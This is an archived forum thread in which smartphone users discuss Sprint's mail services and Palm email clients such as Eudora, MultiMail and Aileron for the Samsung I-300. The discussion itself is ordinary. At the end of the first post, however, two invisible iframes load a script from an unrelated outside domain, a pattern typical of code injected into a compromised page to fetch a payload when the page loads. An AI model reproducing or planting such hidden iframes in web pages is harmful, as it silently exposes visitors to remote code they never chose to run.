+ Reply to Thread

Thread: Managing Mail

Managing Mail

Thankfully there are more options for managing mail on the I-300. I was very disappointed that I was unable to send mail from the Kyocera but like having the WAP / SprintWeb mail option on the Samsung lame as it is.

In terms of sending receiving mail wirelessly, how are others handling this? I use Outlook XP and have an Exchange Server at my office. My coworkers use Blackberrys and I'm resisting, hopeful that there is a wireless conduit to the I-300. I can use forwarding option from Xchange but where to send it to? The short mail will truncate after 100 characters, right? I know I can use a portal like Yahoo but it is a pain to have to go somewhere else to check.

I noticed that this week's PC Magazine (11/27) has a preview of the Handspring "Treo." It is a combo Palm, Phone, and Blackberry, mono model next year and color a few months later; GSM only.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The many mail methods of sprint's wireless web

Originally posted by RustyKeighron
    Thankfully there are more options for managing mail on the I-300. I was very disappointed that I was unable to send mail from the Kyocera but like having the WAP / SprintWeb mail option on the Samsung lame as it is.

In terms of sending receiving mail wirelessly, how are others handling this? I use Outlook XP and have an Exchange Server at my office. My coworkers use Blackberrys and I'm resisting, hopeful that there is a wireless conduit to the I-300. I can use forwarding option from Xchange but where to send it to? The short mail will truncate after 100 characters, right? I know I can use a portal like Yahoo but it is a pain to have to go somewhere else to check.

OK. I spent about a half-hour grilling a (very knowledgable) Sprint rep on all their kinds of mail. It might be helpful for me to spell it out here, 'cuz I couldn't find it all in one place on the website:

Wireless Web Messaging: send a 100 character message to any sprint pcs phone, at phonenumber@messaging.sprintpcs.com or from http://www.messaging.sprintpcs.com/sms/ . It's sent out to the phone as a page, and will either pop up on screen or just show up as a message indicator and a message in your Messages app, depending on your settings. Free for the first 50 / month, something like $0.25 or $0.50 each after that.

Wireless Web Mail: You have this if you sign up for wireless web service. People can send you mail at username@sprintpcs.com . You can read it off of the wireless web program, you can write back, etc. You can also read it online from a regular computer. From that page where you can read it, you can also set whether you are sent a wireless web message for every piece of wireless web mail you receive. The Web mail is free, the airtime for reading it goes according to your plan, the web message that tells you you have web mail is paid for like a conventional web message, and the service for generating and sending you a web message when you get web mail is free "for now."

Wireless Web Short Mail: Not a kind of mail account, but a method of sending mail to other sprint pcs users. Any sprint PCS user can send a canned message to another user with minimal work. You do this from the wireless web, you address it to the person's phone number and choose from a list of a few dozen canned messages (which you can customize.) I believe the recipient receives it as a wireless web message and not wireless web mail, but I'm not actually sure.

Wireless Web Updates: Newsletters and bulletins which you can sign up for, which are delivered by way of wireless web mail. I do not believe there is any fee for the sending of these updates, although there is of course airtime fees if you read them with your phone.

Whew. That's what sprint offers. Of course, we also have:

Accounts you can read over the web: Accounts like Yahoo! Mail which you can access from the blazer browser.

Syncing to your home computer: Using the enclosed palm mail program or some other and setting up mail syncing when you install your palm desktop, you can get a copy of your inbox on your phone's mail program, and send out from your phone as if it's coming from your computer. If you set up hotsync so that you can sync to your computer wirelessly, you can check your desktop's accounts remotely and send messages you compose over palm OS.

Gah. You can see why I had to spend a while with the sprint rep working all this out. Palm simplicity it ain't. I hope this proves useful to someone. And I hope someone could tell me:

Can you read wireless web mail from blazer? If not blazer, some other browser? Does it need to be 2.0? How do you do it? (When I tap on Messaging it says "coming soon" and when I try to load http://www.sprintpcs.com it asks me to use a landline.)

Can you set up Palm Mail, Palm Eudora etc. to download wireless web mail? I, for one, would very much like to send and receive wireless mail from entirely within the palm environment.
    Sorry this is so long! Hope it's helpful to some people.

-vave

I am using a program called MultiMail Pro. http://www.actualsoft.com/
    This app allows you to access your email through POP3, SMTP, or IMAP.

I have my @sprintpcs.com mail forwarded to my earthlink account so I can download my e-mail (via POP3) to my I300. I also have my sprint mail account set to send me a notification when i receive an e-mail. If i choose to, i can download it to my I300, or i can wait until i am at home and then download the message to my computer.

MultiMail has a few features that allow this process to be a little more efficient.
    First: You can set MultiMail to leave a copy of the message on the server. This way you can still download your mail to your computer if you choose.
    Second: MultiMail gives you the option to only download the header of your messages. Then if you choose you can download the entire message body. Although the e-mail alert from sprint includes the message header, so this is actually not so useful if you primarily use your sprint account (or at least forward your mail through it).

Administrator

Arrow

Wireless Web Updates: Newsletters and bulletins which you can sign up for, which are delivered by way of wireless web mail. I do not believe there is any fee for the sending of these updates, although there is of course airtime fees if you read them with your phone.

no fee for reading them as they are sent into the memory of the phone.. but you are limited to 50/month and you are charged after that.. you can also get 100/month also...

Dan
    Well, I've had my I300 now for about a week, and I've been using Eudora to check my POP3 account from my I300. This works like a champ and gives me access to my email at home on my desktop or on my I300.

Now all I need is a way to SMS my phone when I get new mail...

Hey Dan, this is easy, just forward your mail trough your @sprintpcs.com account by forwarding your most used mail account to your sprint account, then forward your sprint account to another account that you can access via POP3 (so you can access it with your phone or computer). Then select the option on the sprint mail preferences page to send your phone a message when you receive an e-mail. Sprint will send your phone a SMS message with the header of the e-mail.

The only drawback is every so often you have to clean out your sprint mail account since you only have 3MB of storage.

Rusty,

You may want to try Aileron from Corsoft or Multimail and set it up using the IMAP4 protocol. I prefer Aileron. I've had lockups and slowness issues with MM. I originally was using pop3 protocol to take mail off the microsoft exhange server. The switch to IMAP was painless.

Just for everyones interest in comparing Multimail support with Aileron(Corsoft),I sent an email at 10 AM to Corsoft. I got a voicemail at 11 AM wanting to discuss my issues and a email at 11:40 AM detailing the solutions. I consider 24 hours acceptable response, this I consider outstanding.

Of course, you can dial up to your AOL account on your I300 and send and recieve AOL mail.

Get EUDORA!

Go to http://www.eudora.com/internetsuite/download/ and get Eudora for palm (even comes with a seperate web browser).

You can pull the messages down (or limit to a certain length of them if you wish) and disconnect. Write new messages and then send when you disconnect.

Works pretty good and saves on those day minutes.

Gary

I AGREE... GO FOR EUDORA!

Try the Eudora palm application. I have is set-up to access 3 different e-mail accounts and it works perfectly. It allows me to leave the messages on the server, download only a certain length of the e-mail message, and automatically disconect when finished.

One of the best features I found when compaired to the on-line mail services is that I can write the message when not connected to the internet and send it when I am finished. This uses very few minutes.

Best of all... it's FREE!

Good luck!

Even though I'm using Aileron, I had good success with Eudora too and you can't beat free. It was fast and bug free. However I needed IMAP protocol. I think Aileron can receive attachments (can't send) which is a plus. If you didn't need attachments or IMAP4, I would probably go with free. Probably other differences which others can elaborate on.

Syncing E-mail

What's up people. I'm new here. I just bought my I300 the other day. Anyway, my question is... I'm using Iambic mail right now (tried eudora, had some problems). Everything syncs fine when mail is downloaded on my desktop computer. However, I noticed that after I check my email via I300, during a hotsync, new messages on the phone will not be transferred from the phone to outlook express. I know I can tell Iambic to leave messages on the server but then outlook express downloads the same messages from the mail server and thinks they are new messages. Is there anyway I can get around this "problem?"

Thanks
    Tom

smartphonecentral.com
    I use Eudora but I'm disappointed that only BaseJet (as far as I know, and none of the other online retrieval clients) has figured out that e-mail lists on the Palm need to be done on *two* lines; you simply can't cram time, sender and subject into 160 pixels.

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

msgAgent

I've found MsgAgent to be a simple but effective basic POP client:
    http://palmgear.com/software/showsof...47&prodID=5364

It's small, free, fairly fast, and allows for multiple accounts and folders/drafts, allows you to read/reply offline, can avoid messages over a certain lenghth (3mb attachments aren't fun at cellar 14.4 speeds!) and, of course, lets you leave messages on the server so you can still read everything in Outlook or whatever.

Wannabe Techie

Hey...

Anybody use Mailer from Electronic Pocket yet? I've fooled around with it and it seems cool. I haven't tried Eudora yet. I need a real email solution. I'm getting rid of AOL cause in short, it SUCKS! Anyother suggestions, or I'll just stick with Mailer.
    "...my palms are too hairy to hide."
    -Eminem

Haven't tried that one, but you must check out Gopherking ! One thing I have always wanted is the ability to view attached images in email. Gopherking allows this, because it is web based. Very cool app indeed!

Craig
    I thought grafitti was illegal?